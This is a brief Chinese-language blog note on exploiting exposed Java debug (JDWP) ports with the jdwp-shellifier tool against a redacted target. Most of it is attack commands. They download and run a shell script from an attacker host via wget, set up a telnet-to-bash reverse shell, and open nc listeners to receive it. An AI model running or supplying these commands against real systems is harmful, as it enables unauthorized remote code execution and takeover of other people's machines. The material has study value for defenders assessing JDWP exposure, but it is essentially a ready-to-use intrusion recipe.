好久没更新博客,一切都因为太忙
偶遇几个JDWP,测试下 漏洞存在所以写个笔记记下
NMAP扫描
利用工具: https://github.com/IOActive/jdwp-shellifier
要触发**.**.**.**.ServerSocket.accept 访问一下web端口就行了
此目标的Web端口是8009哦
姿势来自
http://www.wooyun.org/bugs/wooyun-2010-095744
增加利用telnet反弹得到shell的方法,以国内某设备为例
./jdwp-exp.py -t **.**.**.** -p 8000 --cmd 'wget http://x.x.x.x:2222/shell.txt -O /tmp/shell.sh'
./jdwp-exp.py -t **.**.**.** -p 8000 --cmd 'chmod a+x /tmp/shell.sh'
./jdwp-exp.py -t **.**.**.** -p 8000 --cmd '/tmp/shell.sh'
shell.txt内容:(需要开2个端口,一个用于发送命令一个用于接受命令返回)
telnet x.x.x.x 1111 | /bin/bash | telnet x.x.x.x 3333
然后在x.x.x.x服务器上用nc监听1111端口和3333端口
1111端口是发送命令,3333回显命令结果的
两个cmd窗口
nc -nnv -L -p 3333
nc -nnv -L -p 1111